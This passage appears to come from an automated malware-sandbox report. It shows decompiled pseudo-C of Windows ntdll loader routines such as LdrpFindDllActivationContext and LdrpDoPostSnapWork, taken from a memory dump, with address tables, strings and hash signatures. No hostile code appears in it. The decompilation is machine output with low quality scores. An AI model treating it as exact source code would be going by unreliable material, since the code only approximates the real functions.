								E0177BB40(_t262,  &_v68, _t244);
								if(L017443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01781370(_t282, 0x1714e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0177BB40(_t262,  &_v68, _t201);
							if(L017443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01754620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0177F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01781370(_t280, 0x1714e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0177BB40(_t267,  &_v68, _t245);
							if(L017443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01781370(_t284, 0x1714e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0177BB40(_t267,  &_v68, _t224);
						if(L017443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                              0x01743d3c
                                                                              0x01743d42
                                                                              0x01743d44
                                                                              0x01743d46
                                                                              0x01743d49
                                                                              0x01743d4c
                                                                              0x01743d4f
                                                                              0x01743d52
                                                                              0x01743d55
                                                                              0x01743d58
                                                                              0x01743d5b
                                                                              0x01743d5f
                                                                              0x01743d61
                                                                              0x01743d66
                                                                              0x01798213
                                                                              0x01798218
                                                                              0x01744085
                                                                              0x01744088
                                                                              0x0174408e
                                                                              0x01744094
                                                                              0x0174409a
                                                                              0x017440a0
                                                                              0x017440a6
                                                                              0x017440a9
                                                                              0x017440af
                                                                              0x017440b6
                                                                              0x017440bd
                                                                              0x017440bd
                                                                              0x01743d83
                                                                              0x0179821f
                                                                              0x01798229
                                                                              0x01798238
                                                                              0x01798238
                                                                              0x0179823d
                                                                              0x0179823d
                                                                              0x01743da0
                                                                              0x01743daf
                                                                              0x01743db5
                                                                              0x01743dba
                                                                              0x01743dba
                                                                              0x01743dd4
                                                                              0x01743e94
                                                                              0x01743eab
                                                                              0x01743f6d
                                                                              0x01743f84
                                                                              0x0174406b
                                                                              0x0174406b
                                                                              0x0174406e
                                                                              0x0174406e
                                                                              0x01744070
                                                                              0x01744074
                                                                              0x01798351
                                                                              0x01798351
                                                                              0x0174407a
                                                                              0x0174407f
                                                                              0x0179835d
                                                                              0x01798370
                                                                              0x01798377
                                                                              0x01798379
                                                                              0x0179837c
                                                                              0x0179837c
                                                                              0x0179835d
                                                                              0x00000000
                                                                              0x0174407f
                                                                              0x01743f8a
                                                                              0x01743f8d
                                                                              0x01743f90
                                                                              0x01743f95
                                                                              0x0179830d
                                                                              0x0179830f
                                                                              0x01743f9b
                                                                              0x01743fac
                                                                              0x01743fae
                                                                              0x01743fb1
                                                                              0x01743fb1
                                                                              0x01743fb6
                                                                              0x01798317
                                                                              0x0179831a
                                                                              0x00000000
                                                                              0x01743fbc
                                                                              0x01743fc1
                                                                              0x01743fc9
                                                                              0x01743fd7
                                                                              0x01743fda
                                                                              0x01743fdd
                                                                              0x01744021
                                                                              0x01744021
                                                                              0x01744029
                                                                              0x01744030
                                                                              0x01744044
                                                                              0x01744046
                                                                              0x01744046
                                                                              0x01744044
                                                                              0x01744049
                                                                              0x01798327
                                                                              0x01798334
                                                                              0x01798339
                                                                              0x0179833c
                                                                              0x0174404f
                                                                              0x0174404f
                                                                              0x0174404f
                                                                              0x01744051
                                                                              0x01744056
                                                                              0x01744063
                                                                              0x01744063
                                                                              0x01744068
                                                                              0x00000000
                                                                              0x01744068
                                                                              0x01743fdf
                                                                              0x01743fe2
                                                                              0x01743fe4
                                                                              0x01743fe7
                                                                              0x01743fef
                                                                              0x01744003
                                                                              0x01744005
                                                                              0x01744005
                                                                              0x0174400c
                                                                              0x01744013
                                                                              0x01744016
                                                                              0x01744017
                                                                              0x0174401b
                                                                              0x0174401e
                                                                              0x00000000
                                                                              0x0174401e
                                                                              0x01743fb6
                                                                              0x01743eb1
                                                                              0x01743eb4
                                                                              0x01743eb7
                                                                              0x01743ebc
                                                                              0x017982a9
                                                                              0x017982ab
                                                                              0x01743ec2
                                                                              0x01743ed3
                                                                              0x01743ed5
                                                                              0x01743ed8
                                                                              0x01743ed8
                                                                              0x01743edd
                                                                              0x017982b3
                                                                              0x017982b6
                                                                              0x00000000
                                                                              0x01743ee3
                                                                              0x01743ee8
                                                                              0x01743eed
                                                                              0x01743ef0
                                                                              0x01743ef3
                                                                              0x01743f02
                                                                              0x01743f05
                                                                              0x01743f08
                                                                              0x017982c0
                                                                              0x017982c3
                                                                              0x017982c5
                                                                              0x017982c8
                                                                              0x017982d0
                                                                              0x017982e4
                                                                              0x017982e6
                                                                              0x017982e6
                                                                              0x017982ed
                                                                              0x017982f4
                                                                              0x017982f7
                                                                              0x017982f8
                                                                              0x017982fc
                                                                              0x017982ff
                                                                              0x017982ff
                                                                              0x01743f0e
                                                                              0x01743f11
                                                                              0x01743f16
                                                                              0x01743f1d
                                                                              0x01743f31
                                                                              0x01798307
                                                                              0x01798307
                                                                              0x01743f31
                                                                              0x01743f39
                                                                              0x01743f48
                                                                              0x01743f4d
                                                                              0x01743f50
                                                                              0x01743f50
                                                                              0x01743f53
                                                                              0x01743f58
                                                                              0x01743f65
                                                                              0x01743f65
                                                                              0x01743f6a
                                                                              0x00000000
                                                                              0x01743f6a
                                                                              0x01743edd
                                                                              0x01743dda
                                                                              0x01743ddd
                                                                              0x01743de0
                                                                              0x01743de5
                                                                              0x01798245
                                                                              0x01743deb
                                                                              0x01743df7
                                                                              0x01743dfc
                                                                              0x01743dfe
                                                                              0x01743e01
                                                                              0x01743e01
                                                                              0x01743e06
                                                                              0x0179824d
                                                                              0x0179824f
                                                                              0x01798254
                                                                              0x00000000
                                                                              0x01743e0c
                                                                              0x01743e11
                                                                              0x01743e16
                                                                              0x01743e19
                                                                              0x01743e29
                                                                              0x01743e2c
                                                                              0x01743e2f
                                                                              0x0179825c
                                                                              0x0179825f
                                                                              0x01798261
                                                                              0x01798264
                                                                              0x0179826c
                                                                              0x01798280
                                                                              0x01798282
                                                                              0x01798282
                                                                              0x01798289
                                                                              0x01798290
                                                                              0x01798293
                                                                              0x01798294
                                                                              0x01798298
                                                                              0x0179829b
                                                                              0x0179829b
                                                                              0x01743e35
                                                                              0x01743e38
                                                                              0x01743e3d
                                                                              0x01743e44
                                                                              0x01743e58
                                                                              0x017982a3
                                                                              0x017982a3
                                                                              0x01743e58
                                                                              0x01743e60
                                                                              0x01743e6f
                                                                              0x01743e74
                                                                              0x01743e77
                                                                              0x01743e77
                                                                              0x01743e7a
                                                                              0x01743e7f
                                                                              0x01743e8c
                                                                              0x01743e8c
                                                                              0x01743e91
                                                                              0x00000000
                                                                              0x01743e91

                                                                              Strings
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 01743D8C
                                                                              • WindowsExcludedProcs, xrefs: 01743D6F
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 01743DC0
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 01743E97
                                                                              • Kernel-MUI-Language-SKU, xrefs: 01743F70
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              • Opcode ID: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                              • Instruction ID: d1f31bb76dbe9834f44f0f0df657eadcf852884b31d85cb3cb7b7d78ab7f2805
                                                                              • Opcode Fuzzy Hash: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                              • Instruction Fuzzy Hash: 27F15E72D00619EFCF11DF98D984AEEFBB9FF09650F1400AAE906A7214D7749E05CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01768E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 44%
                                                                              			E01768E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x182d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1828464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1825780 & 0x00000003) != 0) {
							E017B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1825780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0177B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1827984; // 0x12d2bf8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1828464; // 0x74790110
					 *0x182b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01769B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1825780 & 0x00000005) != 0) {
						_push(_t49);
						E017B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                              0x01768e0f
                                                                              0x01768e16
                                                                              0x01768e19
                                                                              0x01768e1b
                                                                              0x01768e21
                                                                              0x01768e7f
                                                                              0x01768e85
                                                                              0x017a9354
                                                                              0x017a936c
                                                                              0x017a9371
                                                                              0x017a937b
                                                                              0x017a9381
                                                                              0x017a9381
                                                                              0x017a937b
                                                                              0x01768e9d
                                                                              0x01768e9d
                                                                              0x01768e29
                                                                              0x01768e2c
                                                                              0x01768e38
                                                                              0x01768e3e
                                                                              0x01768e43
                                                                              0x01768eb5
                                                                              0x01768eb9
                                                                              0x017a92aa
                                                                              0x017a92af
                                                                              0x017a92e8
                                                                              0x017a92e8
                                                                              0x017a92af
                                                                              0x01768eb9
                                                                              0x01768e45
                                                                              0x01768e53
                                                                              0x01768e5b
                                                                              0x01768e5f
                                                                              0x01768e78
                                                                              0x01768e78
                                                                              0x01768e7d
                                                                              0x01768ec3
                                                                              0x01768ecd
                                                                              0x01768ed2
                                                                              0x01768ed2
                                                                              0x01768ec5
                                                                              0x01768ec5
                                                                              0x00000000
                                                                              0x01768e7d
                                                                              0x01768e67
                                                                              0x01768ea4
                                                                              0x017a931a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a9320
                                                                              0x01768ea4
                                                                              0x01768e70
                                                                              0x017a9325
                                                                              0x017a9340
                                                                              0x017a9345
                                                                              0x017a9345
                                                                              0x01768e76
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Strings
                                                                              • LdrpFindDllActivationContext, xrefs: 017A9331, 017A935D
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 017A933B, 017A9367
                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 017A9357
                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A932A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 0-3779518884
                                                                              • Opcode ID: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                              • Instruction ID: 569cd1dccdbae871dfc61c2d20a524ebe1d84ff77db44c6a2a7d0596e84b62d4
                                                                              • Opcode Fuzzy Hash: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                              • Instruction Fuzzy Hash: 5E412872A403119FEF32AB1CCC8DA75F6BDAB49304F098269EE0457155E7709D80C783
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01748794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E01748794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0174934A() != 0) {
								_t159 = E017BA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1825780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E017B5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1825780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0174849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01748999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01748999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1825c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1825c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01752280(_t92, 0x18286cc);
															_t94 = E01809DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E017661A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1825c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01748A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1825c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1825c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0177F380(_t136, 0x1711184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01752280(_t108, 0x18286cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E017661A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01809D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0174FFB0(_t118, _t156, 0x18286cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01779A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                              0x01748799
                                                                              0x0174879d
                                                                              0x017487a1
                                                                              0x017487a3
                                                                              0x017487a8
                                                                              0x017487c3
                                                                              0x017487c3
                                                                              0x017487c8
                                                                              0x017487d1
                                                                              0x017487d4
                                                                              0x017487d8
                                                                              0x017487e5
                                                                              0x017487ec
                                                                              0x01799bfe
                                                                              0x01799c00
                                                                              0x01799c02
                                                                              0x01799c08
                                                                              0x01799c0d
                                                                              0x01799c0f
                                                                              0x01799c14
                                                                              0x01799c2d
                                                                              0x01799c32
                                                                              0x01799c37
                                                                              0x01799c3a
                                                                              0x01799c3c
                                                                              0x01799c42
                                                                              0x01799c42
                                                                              0x01799c3c
                                                                              0x01799c02
                                                                              0x017487da
                                                                              0x017487df
                                                                              0x017487e3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017487e3
                                                                              0x017487f2
                                                                              0x00000000
                                                                              0x017487fb
                                                                              0x017487fd
                                                                              0x017487fe
                                                                              0x0174880e
                                                                              0x0174880f
                                                                              0x01748810
                                                                              0x01748814
                                                                              0x0174881a
                                                                              0x0174881c
                                                                              0x0174881f
                                                                              0x01748821
                                                                              0x01748822
                                                                              0x01748824
                                                                              0x01748826
                                                                              0x0174882c
                                                                              0x0174882e
                                                                              0x01799c48
                                                                              0x01799c48
                                                                              0x01748834
                                                                              0x01748834
                                                                              0x01748837
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01748837
                                                                              0x0174882e
                                                                              0x0174883d
                                                                              0x01748840
                                                                              0x01748843
                                                                              0x01748846
                                                                              0x01748849
                                                                              0x0174884c
                                                                              0x0174884e
                                                                              0x01748850
                                                                              0x01748852
                                                                              0x01748854
                                                                              0x01748857
                                                                              0x017488b4
                                                                              0x017488b6
                                                                              0x017488b6
                                                                              0x01748859
                                                                              0x01748859
                                                                              0x01748859
                                                                              0x01748861
                                                                              0x01748866
                                                                              0x0174886a
                                                                              0x0174893d
                                                                              0x01748941
                                                                              0x00000000
                                                                              0x01748947
                                                                              0x01748947
                                                                              0x0174894a
                                                                              0x0174894c
                                                                              0x00000000
                                                                              0x01748952
                                                                              0x01748955
                                                                              0x0174895a
                                                                              0x0174895d
                                                                              0x0174895d
                                                                              0x0174895f
                                                                              0x01748961
                                                                              0x01748961
                                                                              0x01748968
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0174896a
                                                                              0x0174896b
                                                                              0x0174896e
                                                                              0x00000000
                                                                              0x01748970
                                                                              0x01748970
                                                                              0x01748970
                                                                              0x01748970
                                                                              0x01748972
                                                                              0x01748972
                                                                              0x01748974
                                                                              0x00000000
                                                                              0x0174897a
                                                                              0x0174897a
                                                                              0x0174897d
                                                                              0x00000000
                                                                              0x01748983
                                                                              0x01799c65
                                                                              0x01799c6d
                                                                              0x01799c72
                                                                              0x01799c75
                                                                              0x01799c75
                                                                              0x01799c82
                                                                              0x01799c86
                                                                              0x01799c87
                                                                              0x01799c88
                                                                              0x01799c89
                                                                              0x01799c8c
                                                                              0x01799c90
                                                                              0x01799c95
                                                                              0x01799c97
                                                                              0x01799ca0
                                                                              0x01799ca3
                                                                              0x01799ca9
                                                                              0x01799ca9
                                                                              0x00000000
                                                                              0x01799ca9
                                                                              0x01799ca3
                                                                              0x00000000
                                                                              0x01799c97
                                                                              0x0174897d
                                                                              0x00000000
                                                                              0x01748974
                                                                              0x01748988
                                                                              0x01748992
                                                                              0x01748996
                                                                              0x00000000
                                                                              0x01748996
                                                                              0x0174894c
                                                                              0x00000000
                                                                              0x01748870
                                                                              0x0174887b
                                                                              0x0174887d
                                                                              0x0174887f
                                                                              0x01748881
                                                                              0x01748884
                                                                              0x01748884
                                                                              0x01748886
                                                                              0x01748889
                                                                              0x0174888c
                                                                              0x0174888e
                                                                              0x01748891
                                                                              0x01748891
                                                                              0x01748898
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0174889a
                                                                              0x0174889b
                                                                              0x0174889e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017488a0
                                                                              0x017488a8
                                                                              0x017488b0
                                                                              0x017488b2
                                                                              0x017488d3
                                                                              0x017488d5
                                                                              0x00000000
                                                                              0x017488d7
                                                                              0x017488db
                                                                              0x017488dc
                                                                              0x017488e0
                                                                              0x017488e8
                                                                              0x017488ee
                                                                              0x017488f0
                                                                              0x017488f3
                                                                              0x017488fc
                                                                              0x01748901
                                                                              0x01748906
                                                                              0x0174890c
                                                                              0x0174890c
                                                                              0x0174890f
                                                                              0x01748916
                                                                              0x01748917
                                                                              0x01748918
                                                                              0x01748919
                                                                              0x0174891a
                                                                              0x0174891f
                                                                              0x01748921
                                                                              0x01799c52
                                                                              0x01799c55
                                                                              0x01799c5b
                                                                              0x01799cac
                                                                              0x01799cc0
                                                                              0x01799cc0
                                                                              0x01799c55
                                                                              0x01748927
                                                                              0x01748927
                                                                              0x0174892f
                                                                              0x01748933
                                                                              0x00000000
                                                                              0x017488f5
                                                                              0x017488f5
                                                                              0x00000000
                                                                              0x017488f7
                                                                              0x017488f7
                                                                              0x017488fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017488fa
                                                                              0x017488f5
                                                                              0x017488f3
                                                                              0x00000000
                                                                              0x017488d5
                                                                              0x00000000
                                                                              0x017488b2
                                                                              0x017488c9
                                                                              0x00000000
                                                                              0x017488c9
                                                                              0x0174887f
                                                                              0x0174886a
                                                                              0x01748857
                                                                              0x01748852
                                                                              0x017488bf
                                                                              0x017488bf
                                                                              0x017487aa
                                                                              0x017487ad
                                                                              0x017487ae
                                                                              0x017487b4
                                                                              0x017487b5
                                                                              0x017487b6
                                                                              0x017487b8
                                                                              0x017487bd
                                                                              0x017487c1
                                                                              0x017487f4
                                                                              0x017487fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017487c1
                                                                              0x00000000

                                                                              Strings
                                                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01799C18
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01799C28
                                                                              • LdrpDoPostSnapWork, xrefs: 01799C1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 2994545307-1948996284
                                                                              • Opcode ID: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                              • Instruction ID: f83cad0f77f1e1acfac815fb1c367fb941cf098021bba74f931b628fc1658918
                                                                              • Opcode Fuzzy Hash: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
